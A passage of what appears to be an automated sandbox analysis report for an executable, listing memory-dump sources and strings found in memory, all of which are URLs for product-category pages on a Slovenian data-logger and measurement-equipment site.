                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-brezz
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-seti/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vecka
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vsi/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-za-ex
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/hladna-veriga-in-pr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/programska-oprema-z
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/rutinske-kontrole/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/validacije/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/kompletni-ka
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/prospekti-br
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 